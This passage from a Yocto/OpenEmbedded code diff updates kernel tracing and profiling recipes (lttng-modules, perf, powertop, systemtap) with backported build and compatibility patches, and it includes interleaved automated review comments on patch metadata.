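+
+The upstream commit 14c174633f349cb41ea90c2c0aaddac157012f74 removing
+the 'random' tracepoints is being backported to multiple stable kernel
+branches, I don't see how that qualifies as a fix but here we are.
+
+Use the presence of 'include/trace/events/random.h' in the kernel source
+tree instead of the rather tortuous version check to determine if we
+need to build 'lttng-probe-random.ko'.
+
+Upstream-Status: Backport [ed1149ef88fb62c365ac66cf62c58ac6abd8d7e8]
+Change-Id: I8f5f2f4c9e09c61127c49c7949b22dd3fab0460d
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 16 ++++------------
+ 1 file changed, 4 insertions(+), 12 deletions(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 87f2d681..f09d6b65 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -216,18 +216,10 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+ endif
+
+ # Introduced in v3.6, remove in v5.18
+-obj-$(CONFIG_LTTNG) += $(shell \
+- if [ \( ! \( $(VERSION) -ge 6 \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
+- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+- -a \
+- $(VERSION) -ge 4 \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 0 -a $(SUBLEVEL) -ge 41 \) ] ; then \
+- echo "lttng-probe-random.o" ; fi;)
++random_dep = $(srctree)/include/trace/events/random.h
++ifneq ($(wildcard $(random_dep)),)
++ obj-$(CONFIG_LTTNG) += lttng-probe-random.o
++endif
+
+ obj-$(CONFIG_LTTNG) += $(shell \
+ if [ $(VERSION) -ge 4 \
+--
+2.35.1
+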
diff --git a/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
new file mode 100644
index 0000000000..b4939188cc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
@@ -0,0 +1,147 @@
1fix: jbd2: use the correct print format
2See upstream commit :
3
4 commit d87a7b4c77a997d5388566dd511ca8e6b8e8a0a8
5 Author: Bixuan Cui <cuibixuan@linux.alibaba.com>
6 Date: Tue Oct 11 19:33:44 2022 +0800
7
8 jbd2: use the correct print format
9
10 The print format error was found when using ftrace event:
11 <...>-1406 [000] .... 23599442.895823: jbd2_end_commit: dev 252,8 transaction -1866216965 sync 0 head -1866217368
12 <...>-1406 [000] .... 23599442.896299: jbd2_start_commit: dev 252,8 transaction -1866216964 sync 0
13
14 Use the correct print format for transaction, head and tid.
15
16Change-Id: Ic053f0e0c1e24ebc75bae51d07696aaa5e1c0094
17Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
18Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
19
20Upstream-status: Backport
21Signed-off-by: Steve Sakoman <steve@sakoman.com>
22Note: combines three upstream commits:
23https://github.com/lttng/lttng-modules/commit/b28830a0dcdf95ec3e6b390b4d032667deaad0c0
24https://github.com/lttng/lttng-modules/commit/4fd2615b87b3cac0fd5bdc5fc82db05f6fcfdecf
25https://github.com/lttng/lttng-modules/commit/612c99eb24bf72f4d47d02025e92de8c35ece14e
26
27diff --git a/instrumentation/events/lttng-module/jbd2.h b/instrumentation/events/lttng-module/jbd2.h
28--- a/instrumentation/events/lttng-module/jbd2.h
29+++ b/instrumentation/events/lttng-module/jbd2.h
30@@ -29,6 +29,25 @@ LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint,
31 )
32 )
33
34+#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
35+ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
36+ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
37+ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
38+ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
39+ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
40+LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
41+
42+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
43+
44+ TP_ARGS(journal, commit_transaction),
45+
46+ TP_FIELDS(
47+ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
48+ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
49+ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
50+ )
51+)
52+#else
53 LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
54
55 TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
56@@ -41,6 +60,7 @@ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit
57 ctf_integer(int, transaction, commit_transaction->t_tid)
58 )
59 )
60+#endif
61
62 LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_commit, jbd2_start_commit,
63
64@@ -79,6 +99,25 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_com
65 )
66 #endif
67
68+#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
69+ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
70+ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
71+ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
72+ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
73+ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
74+LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
75+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
76+
77+ TP_ARGS(journal, commit_transaction),
78+
79+ TP_FIELDS(
80+ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
81+ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
82+ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
83+ ctf_integer(tid_t, head, journal->j_tail_sequence)
84+ )
85+)
86+#else
87 LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
88 TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
89
90@@ -91,6 +130,7 @@ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
91 ctf_integer(int, head, journal->j_tail_sequence)
92 )
93 )
94+#endif
95
96 LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode_data,
97 TP_PROTO(struct inode *inode),
98@@ -103,7 +143,48 @@ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode
99 )
100 )
101
102-#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(2,6,32))
103+#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
104+ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
105+ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
106+ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
107+ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
108+ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
109+LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
110+ TP_PROTO(dev_t dev, tid_t tid,
111+ struct transaction_run_stats_s *stats),
112+
113+ TP_ARGS(dev, tid, stats),
114+
115+ TP_FIELDS(
116+ ctf_integer(dev_t, dev, dev)
117+ ctf_integer(tid_t, tid, tid)
118+ ctf_integer(unsigned long, wait, stats->rs_wait)
119+ ctf_integer(unsigned long, running, stats->rs_running)
120+ ctf_integer(unsigned long, locked, stats->rs_locked)
121+ ctf_integer(unsigned long, flushing, stats->rs_flushing)
122+ ctf_integer(unsigned long, logging, stats->rs_logging)
123+ ctf_integer(__u32, handle_count, stats->rs_handle_count)
124+ ctf_integer(__u32, blocks, stats->rs_blocks)
125+ ctf_integer(__u32, blocks_logged, stats->rs_blocks_logged)
126+ )
127+)
128+
129+LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint_stats,
130+ TP_PROTO(dev_t dev, tid_t tid,
131+ struct transaction_chp_stats_s *stats),
132+
133+ TP_ARGS(dev, tid, stats),
134+
135+ TP_FIELDS(
136+ ctf_integer(dev_t, dev, dev)
137+ ctf_integer(tid_t, tid, tid)
138+ ctf_integer(unsigned long, chp_time, stats->cs_chp_time)
139+ ctf_integer(__u32, forced_to_close, stats->cs_forced_to_close)
140+ ctf_integer(__u32, written, stats->cs_written)
141+ ctf_integer(__u32, dropped, stats->cs_dropped)
142+ )
143+)
144+#else
145 LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
146 TP_PROTO(dev_t dev, unsigned long tid,
147 struct transaction_run_stats_s *stats),
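Review bot: The provenance tag on line 20 of the new patch is written `Upstream-status: Backport`, while the other patches added in this commit use `Upstream-Status:`; any tooling that matches the tag case-sensitively would treat this patch as having no status, so it should read `Upstream-Status: Backport` with the three commit URLs kept below it. The file also has no `From`/`Date`/`Subject` header, unlike 0017–0019, so the squash of three upstream commits is recorded only in the free-text note. Keeping that note accurate is what lets a later audit map the kernel-version ranges in the `#if` guards back to upstream.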
diff --git a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
index 26c247e169..8e9c44241b 100644
--- a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb
+++ b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
@@ -1,6 +1,7 @@
1SECTION = "devel" 1SECTION = "devel"
2SUMMARY = "Linux Trace Toolkit KERNEL MODULE" 2SUMMARY = "Linux Trace Toolkit KERNEL MODULE"
3DESCRIPTION = "The lttng-modules 2.0 package contains the kernel tracer modules" 3DESCRIPTION = "The lttng-modules 2.0 package contains the kernel tracer modules"
4HOMEPAGE = "https://lttng.org/"
4LICENSE = "LGPLv2.1 & GPLv2 & MIT" 5LICENSE = "LGPLv2.1 & GPLv2 & MIT"
5LIC_FILES_CHKSUM = "file://LICENSE;md5=3f882d431dc0f32f1f44c0707aa41128" 6LIC_FILES_CHKSUM = "file://LICENSE;md5=3f882d431dc0f32f1f44c0707aa41128"
6 7
@@ -11,26 +12,14 @@ COMPATIBLE_HOST = '(x86_64|i.86|powerpc|aarch64|mips|nios2|arm|riscv).*-linux'
11SRC_URI = "https://lttng.org/files/${BPN}/${BPN}-${PV}.tar.bz2 \ 12SRC_URI = "https://lttng.org/files/${BPN}/${BPN}-${PV}.tar.bz2 \
12 file://Makefile-Do-not-fail-if-CONFIG_TRACEPOINTS-is-not-en.patch \ 13 file://Makefile-Do-not-fail-if-CONFIG_TRACEPOINTS-is-not-en.patch \
13 file://BUILD_RUNTIME_BUG_ON-vs-gcc7.patch \ 14 file://BUILD_RUNTIME_BUG_ON-vs-gcc7.patch \
14 file://0001-fix-strncpy-equals-destination-size-warning.patch \ 15 file://0017-fix-random-remove-unused-tracepoints-v5.18.patch \
15 file://0002-fix-objtool-Rename-frame.h-objtool.h-v5.10.patch \ 16 file://0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch \
16 file://0003-fix-btrfs-tracepoints-output-proper-root-owner-for-t.patch \ 17 file://0019-fix-random-tracepoints-removed-in-stable-kernels.patch \
17 file://0004-fix-btrfs-make-ordered-extent-tracepoint-take-btrfs_.patch \ 18 file://fix-jbd2-use-the-correct-print-format.patch \
18 file://0005-fix-ext4-fast-commit-recovery-path-v5.10.patch \
19 file://0006-fix-KVM-x86-Add-intr-vectoring-info-and-error-code-t.patch \
20 file://0007-fix-kvm-x86-mmu-Add-TDP-MMU-PF-handler-v5.10.patch \
21 file://0008-fix-KVM-x86-mmu-Return-unique-RET_PF_-values-if-the-.patch \
22 file://0009-fix-tracepoint-Optimize-using-static_call-v5.10.patch \
23 file://0010-fix-include-order-for-older-kernels.patch \
24 file://0011-Add-release-maintainer-script.patch \
25 file://0012-Improve-the-release-script.patch \
26 file://0013-fix-backport-of-fix-ext4-fast-commit-recovery-path-v.patch \
27 file://0014-Revert-fix-include-order-for-older-kernels.patch \
28 file://0015-fix-backport-of-fix-tracepoint-Optimize-using-static.patch \
29 file://0016-fix-adjust-version-range-for-trace_find_free_extent.patch \
30 " 19 "
31 20
32SRC_URI[md5sum] = "8ef09fdfcdec669d33f7fc1c1c80f2c4" 21SRC_URI[md5sum] = "cfb23ea6bdaf1ad40c7f9ac098b4016d"
33SRC_URI[sha256sum] = "23372811cdcd2ac28ba8c9d09484ed5f9238cfbd0043f8c663ff3875ba9c8566" 22SRC_URI[sha256sum] = "0c5fe9f8d8dbd1411a3c1c643dcbd0a55577bd15845758b73948e00bc7c387a6"
34 23
35export INSTALL_MOD_DIR="kernel/lttng-modules" 24export INSTALL_MOD_DIR="kernel/lttng-modules"
36 25
@@ -38,7 +27,9 @@ EXTRA_OEMAKE += "KERNELDIR='${STAGING_KERNEL_DIR}'"
38 27
39do_install_append() { 28do_install_append() {
40 # Delete empty directories to avoid QA failures if no modules were built 29 # Delete empty directories to avoid QA failures if no modules were built
41 find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \; 30 if [ -d ${D}/${nonarch_base_libdir} ]; then
31 find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
32 fi
42} 33}
43 34
44python do_package_prepend() { 35python do_package_prepend() {
diff --git a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
index a969fffd62..6306193809 100644
--- a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
+++ b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
@@ -3,13 +3,14 @@ SUMMARY = "Linux Trace Toolkit Control"
3DESCRIPTION = "The Linux trace toolkit is a suite of tools designed \ 3DESCRIPTION = "The Linux trace toolkit is a suite of tools designed \
4to extract program execution details from the Linux operating system \ 4to extract program execution details from the Linux operating system \
5and interpret them." 5and interpret them."
6HOMEPAGE = "https://github.com/lttng/lttng-tools"
6 7
7LICENSE = "GPLv2 & LGPLv2.1" 8LICENSE = "GPLv2 & LGPLv2.1"
8LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \ 9LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \
9 file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ 10 file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
10 file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca" 11 file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca"
11 12
12DEPENDS = "liburcu popt libxml2 util-linux" 13DEPENDS = "liburcu popt libxml2 util-linux bison-native"
13RDEPENDS_${PN} = "libgcc" 14RDEPENDS_${PN} = "libgcc"
14RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core" 15RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core"
15RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils" 16RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils"
diff --git a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
index c7edb20ee4..32b89bb5ea 100644
--- a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
+++ b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
@@ -1,8 +1,9 @@
1SUMMARY = "Build tools needed by external modules" 1SUMMARY = "Build tools needed by external modules"
2HOMEPAGE = "https://www.yoctoproject.org/"
2LICENSE = "GPLv2" 3LICENSE = "GPLv2"
3LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/GPL-2.0;md5=801f80980d171dd6425610833a22dbe6" 4LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/GPL-2.0;md5=801f80980d171dd6425610833a22dbe6"
4 5
5inherit kernel-arch 6inherit kernel-arch linux-kernel-base
6inherit pkgconfig 7inherit pkgconfig
7 8
8PACKAGE_ARCH = "${MACHINE_ARCH}" 9PACKAGE_ARCH = "${MACHINE_ARCH}"
@@ -15,8 +16,10 @@ do_compile[depends] += "virtual/kernel:do_compile_kernelmodules"
15RDEPENDS_${PN}-dev = "" 16RDEPENDS_${PN}-dev = ""
16 17
17DEPENDS += "bc-native bison-native" 18DEPENDS += "bc-native bison-native"
19DEPENDS += "gmp-native"
18 20
19EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}"" 21EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
22EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}" CROSS_COMPILE=${TARGET_PREFIX}"
20 23
21# Build some host tools under work-shared. CC, LD, and AR are probably 24# Build some host tools under work-shared. CC, LD, and AR are probably
22# not used, but this is the historical way of invoking "make scripts". 25# not used, but this is the historical way of invoking "make scripts".
diff --git a/meta/recipes-kernel/perf/perf.bb b/meta/recipes-kernel/perf/perf.bb
index 578b871e9e..42621e47d3 100644
--- a/meta/recipes-kernel/perf/perf.bb
+++ b/meta/recipes-kernel/perf/perf.bb
@@ -9,11 +9,11 @@ HOMEPAGE = "https://perf.wiki.kernel.org/index.php/Main_Page"
9 9
10LICENSE = "GPLv2" 10LICENSE = "GPLv2"
11 11
12PR = "r9" 12PR = "r10"
13 13
14PACKAGECONFIG ??= "scripting tui libunwind" 14PACKAGECONFIG ??= "scripting tui libunwind"
15PACKAGECONFIG[dwarf] = ",NO_DWARF=1" 15PACKAGECONFIG[dwarf] = ",NO_DWARF=1"
16PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3" 16PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3 python3-setuptools-native"
17# gui support was added with kernel 3.6.35 17# gui support was added with kernel 3.6.35
18# since 3.10 libnewt was replaced by slang 18# since 3.10 libnewt was replaced by slang
19# to cover a wide range of kernel we add both dependencies 19# to cover a wide range of kernel we add both dependencies
@@ -45,7 +45,7 @@ PROVIDES = "virtual/perf"
45inherit linux-kernel-base kernel-arch manpages 45inherit linux-kernel-base kernel-arch manpages
46 46
47# needed for building the tools/perf Python bindings 47# needed for building the tools/perf Python bindings
48inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3native', '', d)} 48inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3targetconfig', '', d)}
49inherit python3-dir 49inherit python3-dir
50export PYTHON_SITEPACKAGES_DIR 50export PYTHON_SITEPACKAGES_DIR
51 51
@@ -265,9 +265,9 @@ PACKAGES =+ "${PN}-archive ${PN}-tests ${PN}-perl ${PN}-python"
265 265
266RDEPENDS_${PN} += "elfutils bash" 266RDEPENDS_${PN} += "elfutils bash"
267RDEPENDS_${PN}-archive =+ "bash" 267RDEPENDS_${PN}-archive =+ "bash"
268RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python3', '', d)}" 268RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python', '', d)}"
269RDEPENDS_${PN}-perl =+ "bash perl perl-modules" 269RDEPENDS_${PN}-perl =+ "bash perl perl-modules"
270RDEPENDS_${PN}-tests =+ "python3" 270RDEPENDS_${PN}-tests =+ "python3 bash"
271 271
272RSUGGESTS_SCRIPTING = "${@bb.utils.contains('PACKAGECONFIG', 'scripting', '${PN}-perl ${PN}-python', '',d)}" 272RSUGGESTS_SCRIPTING = "${@bb.utils.contains('PACKAGECONFIG', 'scripting', '${PN}-perl ${PN}-python', '',d)}"
273RSUGGESTS_${PN} += "${PN}-archive ${PN}-tests ${RSUGGESTS_SCRIPTING}" 273RSUGGESTS_${PN} += "${PN}-archive ${PN}-tests ${RSUGGESTS_SCRIPTING}"
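--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
@@ -0,0 +1,70 @@
+From 0d833743954ac1c58773cbf7a78fe0dc8105ae4a Mon Sep 17 00:00:00 2001
+From: Joe Konno <joe.konno@linux.intel.com>
+Date: Tue, 11 Feb 2020 14:15:42 -0800
+Subject: [PATCH] configure.ac: ax_add_fortify_source
+
+Use a maintained autoconf-archive macro to determine whether we need to
+add -D_FORTIFY_SOURCE=3D2, or if the underlying OS (or toolchain) has it
+baked in.
+
+Signed-off-by: Joe Konno <joe.konno@intel.com>
+
+Fixes:
+ aclocal: error: too many loops
+
+Upstream-Status: Backport from 2.12
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ configure.ac | 2 +-
+ m4/gcc_fortify_source_cc.m4 | 29 -----------------------------
+ 2 files changed, 1 insertion(+), 30 deletions(-)
+ delete mode 100644 m4/gcc_fortify_source_cc.m4
+
+diff --git a/configure.ac b/configure.ac
+index d6a15e1..d68369c 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -36,7 +36,7 @@ AC_PROG_LIBTOOL
+ AC_PROG_CC
+ AC_PROG_INSTALL
+ AM_PROG_CC_C_O
+-GCC_FORTIFY_SOURCE_CC
++AX_ADD_FORTIFY_SOURCE
+ AX_CXX_COMPILE_STDCXX_11([noext], [mandatory])
+
+ # Checks for libraries.
+diff --git a/m4/gcc_fortify_source_cc.m4 b/m4/gcc_fortify_source_cc.m4
+deleted file mode 100644
+index 1206672..0000000
+--- a/m4/gcc_fortify_source_cc.m4
++++ /dev/null
+@@ -1,29 +0,0 @@
+-dnl GCC_FORTIFY_SOURCE_CC
+-dnl checks -D_FORTIFY_SOURCE with the C++ compiler, if it exists then
+-dnl updates CXXCPP
+-AC_DEFUN([GCC_FORTIFY_SOURCE_CC],[
+- AC_LANG_ASSERT([C++])
+- AS_IF([test "X$CXX" != "X"], [
+- AC_MSG_CHECKING([for FORTIFY_SOURCE support])
+- fs_old_cxxcpp="$CXXCPP"
+- fs_old_cxxflags="$CXXFLAGS"
+- CXXCPP="$CXXCPP -D_FORTIFY_SOURCE=2"
+- CXXFLAGS="$CXXFLAGS -Werror"
+- AC_COMPILE_IFELSE([
+- AC_LANG_PROGRAM([[]], [[
+- int main(void) {
+- #if !(__GNUC_PREREQ (4, 1) )
+- #error No FORTIFY_SOURCE support
+- #endif
+- return 0;
+- }
+- ]], [
+- AC_MSG_RESULT([yes])
+- ], [
+- AC_MSG_RESULT([no])
+- CXXCPP="$fs_old_cxxcpp"
+- ])
+- ])
+- CXXFLAGS="$fs_old_cxxflags"
+- ])
+-])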
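Review bot: In the patch description (line 7 of the new file) `-D_FORTIFY_SOURCE=3D2` is quoted-printable residue, `=3D` being an encoded `=`, so the text should read `add -D_FORTIFY_SOURCE=2`; as written it looks like a different value from the `-D_FORTIFY_SOURCE=2` that the deleted macro appended to CXXCPP. The `Upstream-Status: Backport from 2.12` line gives no commit id, which makes this hardening-related change harder to trace; `Upstream-Status: Backport [<upstream commit>]` would be the usual form. Because the fortify flag now comes from an autoconf-archive macro instead of the in-tree m4 file, it is worth confirming in the compile log that the define still reaches the C++ compile lines.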
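--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
@@ -0,0 +1,29 @@
+From fbf74492236676e844b021b0dbb45b1ca43a0410 Mon Sep 17 00:00:00 2001
+From: David King <amigadave@amigadave.com>
+Date: Thu, 15 Apr 2021 11:45:13 +0100
+Subject: [PATCH] configure: Use AX_REQUIRE_DEFINED
+
+Require additional macros to be defined early, to avoid an aclocal
+"too many loops" error when copying macros.
+
+Upstream-Status: Backport from tip
+
+Signed-off-by: Tim Orling <ticotimo@gmail.com>
+---
+ configure.ac | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/configure.ac b/configure.ac
+index d68369c..b90831b 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -29,6 +29,9 @@ AM_GNU_GETTEXT([external])
+ AM_GNU_GETTEXT_VERSION([0.18.2])
+
+ m4_ifdef([AM_PROG_AR], [AM_PROG_AR])
++AX_REQUIRE_DEFINED([AX_ADD_FORTIFY_SOURCE])
++AX_REQUIRE_DEFINED([AX_CXX_COMPILE_STDCXX])
++AX_REQUIRE_DEFINED([AX_PTHREAD])
+ # Checks for programs.
+ AC_PROG_CPP
+ AC_PROG_CXX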
diff --git a/meta/recipes-kernel/powertop/powertop_2.10.bb b/meta/recipes-kernel/powertop/powertop_2.10.bb
index f1b0e92b2b..dcbba2fd5c 100644
--- a/meta/recipes-kernel/powertop/powertop_2.10.bb
+++ b/meta/recipes-kernel/powertop/powertop_2.10.bb
@@ -2,13 +2,15 @@ SUMMARY = "Power usage tool"
2DESCRIPTION = "Linux tool to diagnose issues with power consumption and power management." 2DESCRIPTION = "Linux tool to diagnose issues with power consumption and power management."
3HOMEPAGE = "https://01.org/powertop/" 3HOMEPAGE = "https://01.org/powertop/"
4BUGTRACKER = "https://app.devzing.com/powertopbugs/bugzilla" 4BUGTRACKER = "https://app.devzing.com/powertopbugs/bugzilla"
5DEPENDS = "ncurses libnl pciutils" 5DEPENDS = "ncurses libnl pciutils autoconf-archive"
6LICENSE = "GPLv2" 6LICENSE = "GPLv2"
7LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e" 7LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
8 8
9SRC_URI = "git://github.com/fenrus75/powertop;protocol=https \ 9SRC_URI = "git://github.com/fenrus75/powertop;protocol=https;branch=master \
10 file://0001-wakeup_xxx.h-include-limits.h.patch \ 10 file://0001-wakeup_xxx.h-include-limits.h.patch \
11" 11 file://0002-configure.ac-ax_add_fortify_source.patch \
12 file://0003-configure-Use-AX_REQUIRE_DEFINED.patch \
13 "
12SRCREV = "e8765b5475b22b7a2b6e9e8a031c68a268a0b0b3" 14SRCREV = "e8765b5475b22b7a2b6e9e8a031c68a268a0b0b3"
13 15
14S = "${WORKDIR}/git" 16S = "${WORKDIR}/git"
diff --git a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
index 46820ef489..6ee0be5e3e 100644
--- a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
@@ -1,5 +1,5 @@
1SUMMARY = "UProbes kernel module for SystemTap" 1SUMMARY = "UProbes kernel module for SystemTap"
2 2HOMEPAGE = "https://sourceware.org/systemtap/"
3require systemtap_git.inc 3require systemtap_git.inc
4 4
5DEPENDS = "systemtap virtual/kernel" 5DEPENDS = "systemtap virtual/kernel"
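--- /dev/null
+++ b/meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch
@@ -0,0 +1,49 @@
+From f199d1982ef8a6c6d5c06c082d057b8793bcc6aa Mon Sep 17 00:00:00 2001
+From: Serhei Makarov <serhei@serhei.io>
+Date: Fri, 21 Jan 2022 18:21:46 -0500
+Subject: [PATCH] gcc12 c++ compatibility re-tweak for rhel6: use function
+ pointer instead of lambdas instead of ptr_fun<>
+
+Saving 2 lines in ltrim/rtrim is probably not a good reason to drop
+compatibility with the RHEL6 system compiler. Actually declaring a
+named function and passing the function pointer is compatible with
+everything.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=systemtap.git;a=commit;h=f199d1982ef8a6c6d5c06c082d057b8793bcc6aa]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ util.cxx | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+--- a/util.cxx
++++ b/util.cxx
+@@ -1757,21 +1757,24 @@ flush_to_stream (const string &fname, os
+ return 1; // Failure
+ }
+
++int
++not_isspace(unsigned char c)
++{
++ return !std::isspace(c);
++}
++
+ // trim from start (in place)
+ void
+ ltrim(std::string &s)
+ {
+- s.erase(s.begin(),
+- std::find_if(s.begin(), s.end(),
+- std::not1(std::ptr_fun<int, int>(std::isspace))));
++ s.erase(s.begin(), std::find_if(s.begin(), s.end(), not_isspace));
+ }
+
+ // trim from end (in place)
+ void
+ rtrim(std::string &s)
+ {
+- s.erase(std::find_if(s.rbegin(), s.rend(),
+- std::not1(std::ptr_fun<int, int>(std::isspace))).base(), s.end());
++ s.erase(std::find_if(s.rbegin(), s.rend(), not_isspace).base(), s.end());
+ }
+
+ // trim from both ends (in place)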
diff --git a/meta/recipes-kernel/systemtap/systemtap_git.bb b/meta/recipes-kernel/systemtap/systemtap_git.bb
index 1c9f2aed16..a8b2cf1eac 100644
